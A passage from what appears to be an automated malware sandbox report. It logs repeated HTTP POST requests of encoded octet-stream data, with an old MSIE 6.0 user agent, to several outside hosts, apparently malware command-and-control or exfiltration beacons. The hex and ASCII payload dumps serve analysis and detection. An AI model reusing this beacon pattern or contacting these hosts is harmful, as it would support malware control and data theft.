75 47 6e 35 53 41 70 70 49 47 65 75 39 54 49 44 43 33 49 4a 72 42 42 6a 45 32 39 72 4f 46 72 70 47 4f 41 5a 51 31 68 78 74 43 72 55 4a 70 73 61 44 47 6e 4c 32 78 49 6f 7a 71 6c 78 39 7a 58 6c 57 77 33 46 63 44 59 6a 74 52 78 37 58 4c 48 65 53 76 35 41 6e 73 72 64 79 50 30 4a 54 56 2f 56 61 65 7a 50 66 6a 67 57 59 35 46 44 71 78 6d 2b 68 39 6d 6d 6a 7a 66 4d 52 54 36 69 6c 32 2b 43 44 70 55 67 6d 70 2b 42 73 4e 73 4f 42 72 4c 52 34 54 6f 37 4b 69 33 36 51 54 5a 72 64 53 50 6a 59 5a 6c 6d 61 51 6c 53 54 32 72 55 34 79 64 5a 48 56 4a 4f 77 7a 51 2f 61 73 46 4a 47 4b 74 6c 47 43 34 53 72 50 66 6c 77 65 61 78 68 43 62 36 4f 61 31 6f 66 52 2b 44 6c 33 36 78 37 70 65 75 47 4e 61 50 5a 62 61 43 66 7a 58 6d 4a 52 78 62 36 6a 49 56 4a 34 45 48 2f 48 47 44 5a 31 4f 54 61 66 69 73 72 67 63 4d 63 36 63 49 61 51 6a 31 6d 46 2f 5a 31 47 41 2f 33 4f 6d 4a 33 69 2b 6f 33 6e 53 51 64 70 75 31 54 6b 79 67 31 66 65 2f 6e 54 56 7a 58 61 38 42 38 49 63 4a 73 6e 38 43 73 59 68 43 44 61 73 6e 48 6d 66 54 32 61 6b 44 4c 69 6c 73 73 65 41 6e 4c 43 31 57 62 6e 38 30 2f 68 59 54 6a 44 45 51 2f 32 63 78 55 73 57 37 77 4c 50 66 54 61 6c 35 74 2f 56 66 65 42 64 50 62 4e 37 35 52 43 4f 6a 33 41 58 6f 78 47 53 4a 37 78 71 6c 71 39 36 69 76 34 4c 62 53 47 58 57 50 2f 71 33 4b 58 52 55 50 71 46 42 74 4f 49 62 33 64 73 77 42 6b 74 48 4b 71 79 67 47 33 35 64 6d 71 76 6c 32 66 75 63 6c 55 61 6d 4a 4f 61 38 6b 42 67 3d 3d Data Ascii: pFb6LlE8Rmeeb84d8EnxWqoUEysPVCI+FTB35SOsESqvA5FniBsEUzUFYeK5BH+vCisW9zkyaH2GDPHWv+LpoaRafpW8iNzz3/WyG4gJtVWv/2auGn5SAppIGeu9TIDC3IJrBBjE29rOFrpGOAZQ1hxtCrUJpsaDGnL2xIozqlx9zXlWw3FcDYjtRx7XLHeSv5AnsrdyP0JTV/VaezPfjgWY5FDqxm+h9mmjzfMRT6il2+CDpUgmp+BsNsOBrLR4To7Ki36QTZrdSPjYZlmaQlST2rU4ydZHVJOwzQ/asFJGKtlGC4SrPflweaxhCb6Oa1ofR+Dl36x7peuGNaPZbaCfzXmJRxb6jIVJ4EH/HGDZ1OTafisrgcMc6cIaQj1mF/Z1GA/3OmJ3i+o3nSQdpu1Tkyg1fe/nTVzXa8B8IcJsn8CsYhCDasnHmfT2akDLilsseAnLC1Wbn80/hYTjDEQ/2cxUsW7wLPfTal5t/VfeBdPbN75RCOj3AXoxGSJ7xqlq96iv4LbSGXWP/q3KXRUPqFBtOIb3dswBktHKqygG35dmqvl2fuclUamJOa8kBg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 70 46 62 36 4c 6c 45 38 52 6d 65 65 62 38 34 64 38 45 6e 78 57 71 6f 55 45 79 73 50 56 43 49 2b 46 54 42 33 35 53 4f 73 45 53 71 76 41 35 46 6e 69 42 73 45 55 7a 55 46 59 65 4b 35 42 48 2b 76 43 69 73 57 39 7a 6b 79 61 48 32 47 44 50 48 57 76 2b 4c 70 6f 61 52 61 66 70 57 38 69 4e 7a 7a 33 2f 57 79 47 34 67 4a 74 56 57 76 2f 32 61 75 47 6e 35 53 41 70 70 49 47 65 75 39 54 49 44 43 33 49 4a 72 42 42 6a 45 32 39 72 4f 46 72 70 47 4f 41 5a 51 31 68 78 74 43 72 55 4a 70 73 61 44 47 6e 4c 32 78 49 6f 7a 71 6c 78 39 7a 58 6c 57 77 33 46 63 44 59 6a 74 52 78 37 58 4c 48 65 53 76 35 41 6e 73 72 64 79 50 30 4a 54 56 2f 56 61 65 7a 50 66 6a 67 57 59 35 46 44 71 78 6d 2b 68 39 6d 6d 6a 7a 66 4d 52 54 36 69 6c 32 2b 43 44 70 55 67 6d 70 2b 42 73 4e 73 4f 42 72 4c 52 34 54 6f 37 4b 69 33 36 51 54 5a 72 64 53 50 6a 59 5a 6c 6d 61 51 6c 53 54 32 72 55 34 79 64 5a 48 56 4a 4f 77 7a 51 2f 61 73 46 4a 47 4b 74 6c 47 43 34 53 72 50 66 6c 77 65 61 78 68 43 62 36 4f 61 31 6f 66 52 2b 44 6c 33 36 78 37 70 65 75 47 4e 61 50 5a 62 61 43 66 7a 58 6d 4a 52 78 62 36 6a 49 56 4a 34 45 48 2f 48 47 44 5a 31 4f 54 61 66 69 73 72 67 63 4d 63 36 63 49 61 51 6a 31 6d 46 2f 5a 31 47 41 2f 33 4f 6d 4a 33 69 2b 6f 33 6e 53 51 64 70 75 31 54 6b 79 67 31 66 65 2f 6e 54 56 7a 58 61 38 42 38 49 63 4a 73 6e 38 43 73 59 68 43 44 61 73 6e 48 6d 66 54 32 61 6b 44 4c 69 6c 73 73 65 41 6e 4c 43 31 57 62 6e 38 30 2f 68 59 54 6a 44 45 51 2f 32 63 78 55 73 57 37 77 4c 50 66 54 61 6c 35 74 2f 56 66 65 42 64 50 62 4e 37 35 52 43 4f 6a 33 41 58 6f 78 47 53 4a 37 78 71 6c 71 39 36 69 76 34 4c 62 53 47 58 57 50 2f 71 33 4b 58 52 55 50 71 46 42 74 4f 49 62 33 64 73 77 42 6b 74 48 4b 71 79 67 47 33 35 64 6d 71 76 6c 32 66 75 63 6c 55 61 6d 4a 4f 61 38 6b 42 67 3d 3d Data Ascii: pFb6LlE8Rmeeb84d8EnxWqoUEysPVCI+FTB35SOsESqvA5FniBsEUzUFYeK5BH+vCisW9zkyaH2GDPHWv+LpoaRafpW8iNzz3/WyG4gJtVWv/2auGn5SAppIGeu9TIDC3IJrBBjE29rOFrpGOAZQ1hxtCrUJpsaDGnL2xIozqlx9zXlWw3FcDYjtRx7XLHeSv5AnsrdyP0JTV/VaezPfjgWY5FDqxm+h9mmjzfMRT6il2+CDpUgmp+BsNsOBrLR4To7Ki36QTZrdSPjYZlmaQlST2rU4ydZHVJOwzQ/asFJGKtlGC4SrPflweaxhCb6Oa1ofR+Dl36x7peuGNaPZbaCfzXmJRxb6jIVJ4EH/HGDZ1OTafisrgcMc6cIaQj1mF/Z1GA/3OmJ3i+o3nSQdpu1Tkyg1fe/nTVzXa8B8IcJsn8CsYhCDasnHmfT2akDLilsseAnLC1Wbn80/hYTjDEQ/2cxUsW7wLPfTal5t/VfeBdPbN75RCOj3AXoxGSJ7xqlq96iv4LbSGXWP/q3KXRUPqFBtOIb3dswBktHKqygG35dmqvl2fuclUamJOa8kBg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=37744f3bc4c59251d28a660bad74e6c5|102.129.143.78|1679460189|1679460189|0|1|0; snkz=102.129.143.78Data Raw: 2b 34 33 79 43 55 47 34 50 47 66 6e 48 4f 75 37 49 44 52 48 71 68 6f 71 31 57 57 2f 31 74 39 41 42 66 4e 5a 54 69 54 6e 66 2b 6c 63 75 6e 2f 49 7a 56 45 42 50 68 47 43 49 55 48 6b 49 35 76 73 75 67 56 2f 56 6b 66 39 75 4b 4e 2f 39 70 6d 2b 6c 59 61 5a 30 32 43 76 68 37 6d 57 6b 50 77 6e 30 51 6d 67 7a 76 30 53 33 6c 4d 6d 5a 38 46 35 34 70 4b 67 5a 5a 79 64 38 4a 5a 61 67 75 6f 77 57 79 6b 51 69 43 53 79 48 4b 4e 4e 31 55 79 70 6d 33 2f 6c 69 48 45 4a 33 48 4f 4a 2f 4a 38 51 71 58 69 57 2b 6d 4a 59 46 61 6e 47 74 48 5a 36 53 38 63 70 44 57 58 67 63 43 6e 50 4f 75 58 6b 6a 41 38 45 61 48 59 53 57 2b 61 4e 4d 59 6a 43 56 54 51 2b 50 38 6c 53 6e 2b 4a 4c 37 75 4f 50 31 41 4a 79 58 4f 39 57 70 5a 52 46 77 76 5a 38 46 6a 51 37 31 56 64 4b 36 4a 73 41 7a 73 33 48 78 4b 5a 79 30 6b 36 71 4a 76 67 69 41 51 33 4f 49 69 37 42 41 42 6d 38 2f 4b 64 75 72 4e 5a 48 57 2f 39 56 47 65 38 71 4d 41 6e 63 49 37 44 76 4a 45 41 79 4e 61 71 55 6e 50 34 64 70 67 30 32 46 34 5a 4d 62 57 6a 70 5a 4b 42 52 6a 41 4a 33 59 6e 73 57 7a 78 6d 71 75 56 36 52 45 6d 74 69 43 39 6b 5a 4c 69 30 69 4b 43 2b 69 30 74 54 43 75 70 6a 50 62 6a 62 35 57 4e 31 35 6a 53 54 4c 75 6c 67 78 51 78 49 36 56 75 66 55 55 38 4b 52 57 41 38 5a 44 34 74 4d 31 69 65 63 38 79 73 38 66 71 6d 76 4a 67 77 2b 6d 58 2f 7a 2f 78 48 33 77 4c 63 72 77 2f 79 45 4d 4d 4e 73 5a 73 70 37 39 4e 45 67 4b 42 30 70 4f 53 4d 74 2b 5a 2b 73 51 73 59 33 4a 70 56 44 69 45 4a 75 4f 52 6a 67 62 53 30 49 50 51 72 71 78 6e 72 57 42 4d 63 4a 65 66 56 70 58 54 58 4a 38 44 31 6c 76 63 71 74 79 58 32 54 4a 41 74 48 2b 57 70 59 5a 69 56 59 55 58 71 53 32 70 5a 65 36 4a 69 72 47 6f 52 75 49 4a 71 77 68 72 6b 34 59 77 35 45 61 5a 71 4c 46 75 6e 4f 7a 46 35 38 74 48 63 44 6b 41 3d 3d Data Ascii: +43yCUG4PGfnHOu7IDRHqhoq1WW/1t9ABfNZTiTnf+lcun/IzVEBPhGCIUHkI5vsugV/Vkf9uKN/9pm+lYaZ02Cvh7mWkPwn0Qmgzv0S3lMmZ8F54pKgZZyd8JZaguowWykQiCSyHKNN1Uypm3/liHEJ3HOJ/J8QqXiW+mJYFanGtHZ6S8cpDWXgcCnPOuXkjA8EaHYSW+aNMYjCVTQ+P8lSn+JL7uOP1AJyXO9WpZRFwvZ8FjQ71VdK6JsAzs3HxKZy0k6qJvgiAQ3OIi7BABm8/KdurNZHW/9VGe8qMAncI7DvJEAyNaqUnP4dpg02F4ZMbWjpZKBRjAJ3YnsWzxmquV6REmtiC9kZLi0iKC+i0tTCupjPbjb5WN15jSTLulgxQxI6VufUU8KRWA8ZD4tM1iec8ys8fqmvJgw+mX/z/xH3wLcrw/yEMMNsZsp79NEgKB0pOSMt+Z+sQsY3JpVDiEJuORjgbS0IPQrqxnrWBMcJefVpXTXJ8D1lvcqtyX2TJAtH+WpYZiVYUXqS2pZe6JirGoRuIJqwhrk4Yw5EaZqLFunOzF58tHcDkA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 4b 4f 31 33 68 5a 6c 62 55 57 63 47 71 63 4a 53 71 4a 41 41 32 44 4b 66 61 49 48 33 4b 46 7a 58 33 65 63 47 52 6d 68 78 39 71 38 53 57 46 57 6c 71 67 37 41 48 30 34 73 57 4c 58 58 76 43 34 73 67 59 64 52 4a 35 35 75 35 4a 53 5a 6a 4a 6b 62 47 54 68 66 55 31 6d 74 50 36 6c 6c 5a 52 33 53 58 57 4b 65 38 47 4f 6a 62 6a 75 37 4e 70 6e 71 66 66 65 7a 48 79 4e 79 4f 78 7a 6f 78 4e 6b 57 6c 4f 70 2b 76 46 4b 46 30 47 43 4a 38 45 48 39 36 52 49 6e 75 51 4f 77 39 78 73 34 36 33 56 32 46 4c 33 42 2f 50 2b 6e 7a 66 30 57 54 6c 75 52 62 38 61 62 44 6d 52 74 61 69 7a 36 49 57 56 7a 30 53 38 34 45 2f 47 46 30 6c 71 76 31 46 36 70 55 55 51 73 6b 64 54 38 36 55 79 63 37 59 68 39 72 5a 43 59 68 5a 7a 6f 59 4a 6c 62 4b 4c 6a 4b 53 35 4a 56 51 31 4a 70 6e 51 4f 55 72 35 43 74 66 6c 32 66 61 69 6e 33 6c 52 67 36 70 39 4a 7a 42 57 64 4f 65 51 36 6e 35 61 4a 72 64 36 75 38 35 30 2f 5a 47 36 32 47 4a 75 79 77 38 62 35 36 35 52 4d 79 6a 32 46 32 7a 32 65 66 58 55 6d 4a 55 59 6b 71 44 4a 73 69 35 6f 48 79 33 58 74 39 37 45 78 78 4d 41 42 69 4b 65 56 39 58 63 2b 63 6c 6f 42 5a 63 50 72 49 72 6a 79 4c 74 4a 53 53 71 77 47 33 63 4e 64 43 46 36 31 68 34 69 48 45 59 56 68 39 62 64 7a 46 51 44 65 77 6e 39 6f 6c 75 2f 75 41 2b 33 7a 59 69 71 73 5a 37 59 39 6a 79 41 35 77 4b 2f 64 46 30 61 45 49 57 48 2b 44 64 50 38 58 46 6c 73 76 61 49 39 70 62 2f 69 77 79 57 52 67 36 68 73 4f 53 32 42 73 71 4b 78 6d 55 39 7a 49 42 6a 36 59 46 65 54 6d 6a 4b 76 76 66 52 74 31 50 49 35 59 78 4a 39 4f 4b 47 2f 4e 6b 51 34 4d 6a 55 54 47 4c 77 2f 79 76 5a 52 33 4b 76 32 51 4a 49 76 4d 63 57 49 30 76 70 6e 55 31 53 77 4b 2f 50 76 6b 52 39 6f 56 4d 55 4d 79 4e 39 72 67 4d 46 4d 64 6e 44 43 6e 55 2f 6d 6d 31 7a 47 69 47 36 5a 57 Data Ascii: KO13hZlbUWcGqcJSqJAA2DKfaIH3KFzX3ecGRmhx9q8SWFWlqg7AH04sWLXXvC4sgYdRJ55u5JSZjJkbGThfU1mtP6llZR3SXWKe8GOjbju7NpnqffezHyNyOxzoxNkWlOp+vFKF0GCJ8EH96RInuQOw9xs463V2FL3B/P+nzf0WTluRb8abDmRtaiz6IWVz0S84E/GF0lqv1F6pUUQskdT86Uyc7Yh9rZCYhZzoYJlbKLjKS5JVQ1JpnQOUr5Ctfl2fain3lRg6p9JzBWdOeQ6n5aJrd6u850/ZG62GJuyw8b565RMyj2F2z2efXUmJUYkqDJsi5oHy3Xt97ExxMABiKeV9Xc+cloBZcPrIrjyLtJSSqwG3cNdCF61h4iHEYVh9bdzFQDewn9olu/uA+3zYiqsZ7Y9jyA5wK/dF0aEIWH+DdP8XFlsvaI9pb/iwyWRg6hsOS2BsqKxmU9zIBj6YFeTmjKvvfRt1PI5YxJ9OKG/NkQ4MjUTGLw/yvZR3Kv2QJIvMcWI0vpnU1SwK/PvkR9oVMUMyN9rgMFMdnDCnU/mm1zGiG6ZW
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 2f 68 7a 78 6a 6c 71 71 55 57 66 44 6e 54 4f 41 66 58 55 2b 71 4a 33 30 49 53 39 4b 79 61 59 2b 4c 71 4a 38 6a 34 49 4c 69 6a 33 34 7a 59 46 6b 56 79 51 57 50 6d 64 57 75 47 2f 47 74 41 56 57 47 4a 59 78 4a 69 79 6a 61 34 72 79 74 62 34 30 6b 46 70 4e 37 4d 67 52 79 64 73 48 48 54 36 73 6f 64 48 78 51 61 78 59 6e 41 6c 45 68 52 68 75 51 4b 58 51 54 72 62 54 53 43 48 79 63 67 46 4b 53 79 6e 52 4b 52 75 67 55 4f 71 6b 46 45 6b 31 71 75 71 48 41 4a 54 36 77 50 46 6a 33 63 4d 56 4e 4a 5a 64 30 32 71 66 70 39 30 36 46 6a 47 4d 47 46 6c 44 72 39 4c 70 6c 75 4b 4b 30 68 4a 6b 71 68 4a 74 66 31 75 67 65 44 38 62 59 7a 63 63 63 52 42 38 36 2f 69 49 4e 79 46 64 5a 66 73 56 47 4d 4a 2b 4b 6f 54 49 42 45 53 31 54 4b 78 58 53 62 55 68 78 41 37 49 48 65 55 4d 37 65 4c 73 4f 70 67 69 75 42 37 73 2b 2f 63 72 64 46 73 74 46 37 65 68 31 33 53 74 72 69 41 4c 32 37 35 6d 76 5a 34 6d 79 76 50 69 6f 62 4b 76 74 59 33 70 7a 68 52 6f 44 77 54 56 36 6a 79 4b 39 78 4e 4f 67 4f 5a 48 57 51 59 6d 6f 35 62 77 53 54 31 72 33 57 76 59 61 6a 55 67 52 71 57 45 55 5a 35 4c 78 50 70 42 77 6c 56 6d 65 4b 53 75 49 34 79 6e 4d 52 4d 31 63 39 46 2b 63 79 6a 53 48 67 5a 71 43 45 39 54 42 6f 69 66 35 68 70 65 57 4b 70 52 48 61 55 4e 37 31 52 76 74 61 61 65 74 6f 53 74 30 54 37 45 65 4a 30 58 47 6f 72 6e 73 42 62 45 35 75 42 33 76 4d 51 6b 66 4c 39 61 55 61 45 4d 53 44 48 6f 37 46 34 4a 58 41 44 41 6d 37 31 4b 46 6c 79 53 75 72 32 49 6e 2f 56 73 79 53 39 48 57 4f 4f 4b 4a 65 36 4f 78 57 48 41 4f 65 79 4c 77 6b 35 39 39 76 77 69 49 35 52 49 5a 56 67 78 33 42 66 54 45 64 38 78 59 49 57 52 48 64 6f 76 69 6d 7a 58 57 38 38 5a 6b 39 56 70 6c 52 4f 45 73 52 4f 4f 62 4c 38 69 66 6d 4d 44 Data Ascii: /hzxjlqqUWfDnTOAfXU+qJ30IS9KyaY+LqJ8j4ILij34zYFkVyQWPmdWuG/GtAVWGJYxJiyja4rytb40kFpN7MgRydsHHT6sodHxQaxYnAlEhRhuQKXQTrbTSCHycgFKSynRKRugUOqkFEk1quqHAJT6wPFj3cMVNJZd02qfp906FjGMGFlDr9LpluKK0hJkqhJtf1ugeD8bYzcccRB86/iINyFdZfsVGMJ+KoTIBES1TKxXSbUhxA7IHeUM7eLsOpgiuB7s+/crdFstF7eh13StriAL275mvZ4myvPiobKvtY3pzhRoDwTV6jyK9xNOgOZHWQYmo5bwST1r3WvYajUgRqWEUZ5LxPpBwlVmeKSuI4ynMRM1c9F+cyjSHgZqCE9TBoif5hpeWKpRHaUN71RvtaaetoSt0T7EeJ0XGornsBbE5uB3vMQkfL9aUaEMSDHo7F4JXADAm71KFlySur2In/VsyS9HWOOKJe6OxWHAOeyLwk599vwiI5RIZVgx3BfTEd8xYIWRHdovimzXW88Zk9VplROEsROObL8ifmMD
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 37 73 57 64 32 57 68 6e 58 47 65 47 36 59 32 49 4b 36 4e 37 5a 74 76 4f 4f 61 39 77 58 6b 63 72 48 42 6e 47 48 38 48 48 45 64 39 77 4e 56 4d 6a 42 48 61 4a 72 61 73 45 57 42 65 43 36 68 51 62 46 6a 47 55 79 78 57 31 64 73 76 62 4e 66 4e 68 30 4a 69 63 74 71 77 6c 59 34 42 38 64 61 61 6f 6a 54 38 51 52 34 6d 2b 56 75 7a 78 71 66 4f 52 4e 49 70 36 36 58 76 79 51 76 4b 75 57 58 57 49 61 2b 39 6b 79 4d 30 4a 38 38 33 6d 58 71 64 35 56 49 4e 62 33 34 5a 51 42 77 61 32 63 38 63 6f 74 47 70 79 64 54 6c 31 4c 67 46 68 2b 53 4e 37 2f 36 47 69 77 49 65 6f 4f 2f 5a 57 4c 55 6e 6e 79 56 75 74 33 49 59 77 6b 41 77 61 70 31 37 30 57 35 55 59 2f 6d 2b 57 71 43 4c 2b 44 7a 2f 34 6d 35 35 73 66 79 39 68 43 51 4e 52 74 54 64 41 50 4b 70 5a 46 63 55 47 53 72 4a 32 33 79 33 77 32 34 66 35 2f 73 69 4b 32 35 6f 67 64 58 75 74 64 35 75 6a 66 6a 2f 70 35 6b 6d 2f 56 67 4b 7a 64 39 5a 71 67 58 42 64 47 4b 52 75 57 2b 59 4d 43 39 37 44 56 50 51 30 64 39 4b 4b 39 75 51 67 32 64 6b 30 38 5a 32 78 79 34 49 5a 78 2f 44 35 36 59 56 58 78 37 4e 56 65 72 31 50 2f 30 46 67 32 49 77 2b 63 63 4f 70 59 61 4e 50 70 63 4a 54 35 41 72 48 63 61 32 30 30 69 77 35 35 73 63 77 35 52 5a 6b 68 2f 48 45 51 41 6f 61 71 35 42 4f 75 67 6f 63 62 57 6d 45 65 49 42 45 61 42 65 53 56 6b 4e 44 50 39 69 68 63 64 51 33 36 69 78 2b 67 4a 37 78 31 76 67 54 4d 30 51 4b 76 61 6b 52 53 55 4b 79 4b 46 37 33 6f 6c 39 67 4e 4c 2f 49 72 64 79 6d 4b 41 31 33 2b 48 4c 69 46 33 6e 67 67 32 52 6a 47 4d 75 64 63 49 71 70 58 76 35 7a 6c 77 4a 48 34 30 34 71 33 57 61 44 70 56 63 49 41 65 62 54 61 65 75 30 45 4c 75 44 6d 43 57 57 66 59 4c 50 6c 79 70 59 68 42 4b 41 71 57 2b 51 2f 66 78 72 63 65 30 32 63 50 36 68 78 39 47 4f Data Ascii: 7sWd2WhnXGeG6Y2IK6N7ZtvOOa9wXkcrHBnGH8HHEd9wNVMjBHaJrasEWBeC6hQbFjGUyxW1dsvbNfNh0JictqwlY4B8daaojT8QR4m+VuzxqfORNIp66XvyQvKuWXWIa+9kyM0J883mXqd5VINb34ZQBwa2c8cotGpydTl1LgFh+SN7/6GiwIeoO/ZWLUnnyVut3IYwkAwap170W5UY/m+WqCL+Dz/4m55sfy9hCQNRtTdAPKpZFcUGSrJ23y3w24f5/siK25ogdXutd5ujfj/p5km/VgKzd9ZqgXBdGKRuW+YMC97DVPQ0d9KK9uQg2dk08Z2xy4IZx/D56YVXx7NVer1P/0Fg2Iw+ccOpYaNPpcJT5ArHca200iw55scw5RZkh/HEQAoaq5BOugocbWmEeIBEaBeSVkNDP9ihcdQ36ix+gJ7x1vgTM0QKvakRSUKyKF73ol9gNL/IrdymKA13+HLiF3ngg2RjGMudcIqpXv5zlwJH404q3WaDpVcIAebTaeu0ELuDmCWWfYLPlypYhBKAqW+Q/fxrce02cP6hx9GO
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 36 67 6d 2f 31 39 78 58 58 47 64 6e 37 78 48 4b 42 78 47 64 32 32 38 37 2b 61 37 30 32 62 59 48 30 44 36 4b 7a 4c 46 62 30 33 5a 51 66 6a 70 54 2b 35 67 42 33 39 51 38 4c 4a 50 43 4a 72 6f 55 63 50 39 6d 30 30 56 71 35 4c 36 73 6a 43 70 50 43 76 38 56 37 7a 53 2b 4c 52 70 32 2f 36 45 7a 66 41 63 4e 4e 30 38 76 74 69 74 33 44 43 53 4d 4d 33 71 43 62 77 4e 77 54 5a 4a 65 69 2f 77 4a 77 77 36 75 53 52 32 78 37 54 53 6e 71 38 35 79 76 35 51 33 35 2f 7a 38 74 4e 64 74 43 33 53 4e 61 35 46 46 50 6b 65 6e 70 4d 58 69 70 2b 30 63 2b 6e 62 62 4d 62 33 77 4b 54 5a 2f 69 53 37 53 50 5a 49 65 78 6d 2b 4f 6f 4f 35 5a 2f 6d 6c 66 2f 63 72 41 64 43 62 69 6f 36 61 73 4a 4b 69 33 62 57 66 6e 33 73 34 47 79 72 5a 6e 43 42 34 30 6d 76 34 51 56 62 58 38 54 41 4c 59 31 2f 41 64 33 46 70 2f 41 50 76 61 61 34 4b 4e 34 56 6b 34 59 4f 45 34 32 30 31 4f 71 6f 77 2f 2f 74 74 55 5a 55 31 76 51 4f 51 51 6a 6b 78 44 37 65 5a 71 31 35 55 36 2f 77 5a 54 59 32 75 66 39 4f 38 4a 4d 67 73 72 45 46 62 31 7a 73 50 73 35 48 6b 4e 5a 34 31 42 6d 31 57 43 49 74 2b 38 51 41 39 52 4e 38 35 48 34 68 71 6d 6f 4f 36 63 4b 46 67 31 4c 69 43 32 67 33 37 74 72 70 35 63 6c 6c 32 6f 48 39 65 44 30 71 48 7a 6c 4d 34 4f 63 35 5a 4c 78 73 6c 6f 56 57 78 56 68 61 46 31 6b 34 71 65 37 6a 66 77 34 54 67 57 63 49 63 71 45 4f 56 38 46 51 55 48 79 4c 50 62 74 75 4c 49 53 43 76 46 71 70 32 48 47 32 73 55 61 31 7a 39 41 78 51 39 53 39 72 48 58 4c 45 39 41 34 52 39 57 65 35 77 54 57 79 75 32 33 63 37 58 4d 5a 6b 6e 41 6a 62 46 63 77 5a 38 58 48 4f 55 68 51 76 35 53 56 33 42 34 73 4e 43 59 37 65 52 52 51 74 34 48 4d 4d 44 51 43 53 56 66 4d 72 73 49 38 43 69 33 76 35 6f 62 38 3d Data Ascii: 6gm/19xXXGdn7xHKBxGd2287+a702bYH0D6KzLFb03ZQfjpT+5gB39Q8LJPCJroUcP9m00Vq5L6sjCpPCv8V7zS+LRp2/6EzfAcNN08vtit3DCSMM3qCbwNwTZJei/wJww6uSR2x7TSnq85yv5Q35/z8tNdtC3SNa5FFPkenpMXip+0c+nbbMb3wKTZ/iS7SPZIexm+OoO5Z/mlf/crAdCbio6asJKi3bWfn3s4GyrZnCB40mv4QVbX8TALY1/Ad3Fp/APvaa4KN4Vk4YOE4201Oqow//ttUZU1vQOQQjkxD7eZq15U6/wZTY2uf9O8JMgsrEFb1zsPs5HkNZ41Bm1WCIt+8QA9RN85H4hqmoO6cKFg1LiC2g37trp5cll2oH9eD0qHzlM4Oc5ZLxsloVWxVhaF1k4qe7jfw4TgWcIcqEOV8FQUHyLPbtuLISCvFqp2HG2sUa1z9AxQ9S9rHXLE9A4R9We5wTWyu23c7XMZknAjbFcwZ8XHOUhQv5SV3B4sNCY7eRRQt4HMMDQCSVfMrsI8Ci3v5ob8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 4b 51 55 76 69 58 78 36 55 57 66 5a 6c 6b 4b 71 4a 35 4e 37 36 41 2b 58 50 72 4d 55 63 56 37 55 63 44 4e 42 39 71 34 6e 51 43 51 77 55 47 6f 41 59 45 74 7a 57 75 5a 6f 61 59 51 46 4f 45 52 49 59 68 49 79 44 70 69 44 76 30 58 2b 47 77 61 54 45 45 50 72 35 30 75 51 71 55 6f 79 71 2f 67 68 4b 74 69 38 31 47 74 75 79 58 63 50 74 42 76 75 4b 70 62 6a 79 56 78 62 67 77 6c 49 44 59 41 45 2b 45 7a 63 44 55 57 5a 67 6a 43 74 47 38 43 42 34 44 4c 34 35 68 35 4e 50 57 4a 65 71 57 43 4e 53 57 61 45 33 55 37 2b 62 4a 45 5a 71 61 47 49 68 54 31 73 6e 33 79 37 75 38 54 61 57 72 59 30 31 6b 66 45 49 43 4d 6e 56 6c 74 47 36 78 74 6f 76 4d 5a 47 73 53 65 6a 47 4a 57 66 42 57 49 6a 71 74 56 4c 58 52 38 57 61 43 74 68 59 4b 32 74 34 6c 62 52 4f 42 2f 79 33 65 72 79 59 77 45 42 2b 47 38 37 5a 6b 32 6e 6e 79 7a 43 57 43 67 65 31 4f 63 65 68 73 68 33 37 69 4b 35 4e 71 76 54 52 6f 36 61 45 57 39 59 62 6d 58 64 66 77 58 39 33 49 55 6c 38 65 6a 38 55 5a 6b 37 42 50 47 32 6b 51 38 32 2f 46 35 6b 4a 51 4d 63 56 4a 6a 58 56 65 6b 4c 51 37 7a 65 45 33 45 4b 76 64 78 6a 57 72 43 54 43 57 4f 2f 6d 30 78 72 61 4f 6e 52 79 72 73 41 6f 66 4a 4e 37 67 75 7a 78 4e 69 5a 6d 72 69 35 55 37 6c 53 7a 58 46 6d 53 68 36 6e 49 31 30 6a 77 46 61 51 55 6f 35 41 4e 54 57 35 38 51 68 78 67 74 72 68 77 69 4e 37 36 52 69 75 59 45 32 44 78 30 68 7a 4d 73 76 6a 4e 61 68 4c 58 7a 37 64 66 34 30 58 78 6b 36 2b 61 74 4d 46 44 79 77 71 49 44 49 5a 54 42 6e 50 61 6a 7a 55 54 54 77 61 70 4e 55 31 64 45 43 77 37 63 6f 57 6a 45 56 49 70 57 78 72 57 79 51 70 48 7a 6a 74 43 6b 74 58 72 74 44 47 57 6e 67 78 2b 2b 51 66 2f 4a 2b 36 39 4b 6a 58 79 4f 72 77 56 67 52 78 70 2f 32 4c 34 2f 6d 44 71 4b 47 58 Data Ascii: 